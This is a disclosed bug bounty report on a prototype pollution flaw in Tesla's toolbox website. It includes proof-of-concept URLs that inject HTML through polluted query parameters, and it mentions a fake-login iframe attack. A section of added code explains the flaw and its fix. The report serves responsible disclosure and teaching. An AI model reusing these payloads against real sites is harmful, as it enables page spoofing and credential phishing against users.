[toolbox.teslamotors.com] HTML Injection via Prototype Pollution / Potential XSS

Disclosed by
BlackFan
  • Engagement Tesla
  • Disclosed date about 4 years ago
  • Reward $200
  • Priority P4 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by BlackFan

The Toolbox website uses the backbone.queryparams.js script, which is vulnerable to Prototype Pollution.
Using the existing JS code, it is possible to add arbitrary HTML to the page (inline JS is blocked by the CSP).

Report details
  • Submitted
  • Target Location *.teslamotors.com
  • Target category Web App
  • VRT Server-Side Injection > Content Spoofing > iframe Injection
  • Priority P4
  • Bug URL https://toolbox.teslamotors.com/
  • Description

    The Toolbox website uses the backbone.queryparams.js script, which is vulnerable to Prototype Pollution.

    For example:

    • Open URL https://toolbox.teslamotors.com/?__proto__.VULN=PROTOTYPE_POLLUTION
    • Check in the console that Object.prototype.VULN was created (screenshot: Screenshot at 15-16-00.png)

    Using this, an attacker can change the logic of the scripts that execute next, for example to perform HTML injection (in fact this is XSS, but the site has a strict Content-Security-Policy).

    HTML Injection PoC:

    https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&&__proto__.display_name=%3Cmarquee%3E&__proto__.display_name=1
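
The mechanism the report describes, as an added example that is not the page's, backbone.queryparams' or the site's code: a nested-key query parser in the vulnerable shape, its hardened counterpart, and a greeting template standing in for the code that read display_name. All function names and the logged-out user record are assumptions.

```javascript
// Added example, not backbone.queryparams' or the site's code; all names assumed.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function splitPairs(qs) {                // "?a.b=v&c=w" -> [[['a','b'],'v'], [['c'],'w']]
  return qs.replace(/^\?/, '').split('&').filter(Boolean).map((pair) => {
    const [k, v = ''] = pair.split('=');
    return [decodeURIComponent(k).split('.'), decodeURIComponent(v)];
  });
}

// Vulnerable: "__proto__" resolves to Object.prototype, so the write hits every object.
function parseQueryVulnerable(qs) {
  const out = {};
  for (const [path, value] of splitPairs(qs)) {
    let node = out;
    for (const seg of path.slice(0, -1)) {
      if (typeof node[seg] !== 'object' || node[seg] === null) node[seg] = {};
      node = node[seg];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}

// Hardened: reject prototype-reaching segments and build from prototype-less objects.
function parseQuerySafe(qs) {
  const out = Object.create(null);
  for (const [path, value] of splitPairs(qs)) {
    if (path.some((seg) => BLOCKED_KEYS.has(seg))) continue;
    let node = out;
    for (const seg of path.slice(0, -1)) {
      if (typeof node[seg] !== 'object' || node[seg] === null) node[seg] = Object.create(null);
      node = node[seg];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}

// Sink: a user with no own display_name inherits the polluted one, interpolated unescaped.
function renderGreeting(user) {
  return `<span class="user">${user.display_name ?? 'Guest'}</span>`;
}
// Renders a constructed logged-out user before and after each parser, then undoes the pollution.
function demo(qs) {
  const user = {}, before = renderGreeting(user);
  parseQueryVulnerable(qs);
  const polluted = renderGreeting(user);
  delete Object.prototype.display_name;
  parseQuerySafe(qs);
  return { before, polluted, safe: renderGreeting(user) };
}
```

Calling demo('?__proto__.display_name=%3Cmarquee%3E') returns the unpolluted greeting, the greeting with the injected marquee tag after the vulnerable parser ran, and the unpolluted greeting again after the hardened parser ran.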
    

    PoC with Fake Login page via fullscreen iframe:


    (screenshot: Screenshot at 15-19-50.png)
